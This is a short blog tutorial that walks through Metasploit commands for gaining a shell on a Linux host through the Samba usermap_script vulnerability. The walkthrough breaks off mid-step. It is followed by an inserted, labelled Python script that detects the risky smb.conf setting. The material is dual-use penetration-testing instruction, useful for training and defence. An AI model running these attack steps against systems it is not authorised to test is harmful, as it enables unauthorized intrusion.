Hacking and gaining access to Linux by exploiting SAMBA service

February 4, 2018 by V.P. Prabhakaran

Step 1

First, find the open ports and the services running on the target system. The command is:

Command: nmap -sS -Pn -A

Step 2

Once you have found the open ports and services, including the Samba port and service, you can send an exploit through that port to create a Meterpreter session. To perform this attack, open Metasploit.

Step 3

Once Metasploit is open, first find the version of Samba.

Command: msf> search scanner/samba

(This command is used to find the scanner module that identifies the Samba version)

Step 4

Once you have found the scanner that identifies the target's Samba version, select it.

Command: msf> use auxiliary/scanner/smb/smb_version

(This command is used to select the scanner module)

Command 2: msf auxiliary(smb_version) > set RHOSTS

(This command is used to set the IP address of the remote host whose Samba version you need to find)

Command 3: exploit

Step 5

After finding the Samba version, perform the attack and gain access to the Linux system with the help of the Meterpreter session.

Command: msf> use exploit/multi/samba/usermap_script

This is the exploit to select to gain access to the system.

Command: msf exploit(usermap_script) > set RHOST
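
A defender-side check for the setting this exploit depends on, added here as an example and not part of the original article: the Metasploit usermap_script module targets Samba servers that enable the non-default "username map script" option in smb.conf, so the code below parses a config and reports every active use of that option. The sample config, its paths and the function names are constructed for illustration.

```python
import re

# Constructed sample smb.conf (not from the article). Samba ignores case and
# whitespace in parameter names and joins lines that end with a backslash.
SAMPLE_CONF = """\
# Global parameters
[global]
   workgroup = WORKGROUP
   ; username map script = /bin/echo   (commented out, must be ignored)
   User Name  MAP Script = /etc/samba/scripts/\\
mapusers.sh
   username map = /etc/samba/smbusers

[public]
   path = /srv/share
"""

def normalize(name):
    """Reduce a parameter name to the form Samba compares: no spaces, lowercase."""
    return re.sub(r"\s+", "", name).lower()

def find_setting(conf_text, wanted="username map script"):
    """Return [(line_no, section, value)] for every active use of `wanted`."""
    target, section, hits = normalize(wanted), None, []
    pending, start = None, 0          # pending holds a continued logical line
    for no, raw in enumerate(conf_text.splitlines(), 1):
        line = raw.strip()
        if pending is None:
            if not line or line[0] in "#;":   # blank line or comment
                continue
            start = no
        if line.endswith("\\"):               # continuation: keep collecting
            pending = (pending or "") + line[:-1]
            continue
        line, pending = (pending or "") + line, None
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
        elif "=" in line:
            name, value = line.split("=", 1)
            # Exact name match, so the harmless "username map" is not flagged.
            if normalize(name) == target and value.strip():
                hits.append((start, section, value.strip()))
    return hits

if __name__ == "__main__":
    for line_no, section, value in find_setting(SAMPLE_CONF):
        print(f"line {line_no} [{section}]: username map script = {value}")
```

Files pulled in through include directives are not followed, so run the check against each included file as well.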


V.P. Prabhakaran

V.P. Prabhakaran is a highly experienced security pro, having more than 7 years' experience as Senior Information Security Consultant at Koenig Solutions. Mr. Prabhakaran trains and provides consultancy to professionals for Computer Hacking, Forensic Security and Firewalls. He is certified in CEH, ECSA, ECSS, CHFI, EDRP, ECIH, CEI, OSSTMM (OPST and OPSA) ISECOM Trainer MCT and CEI.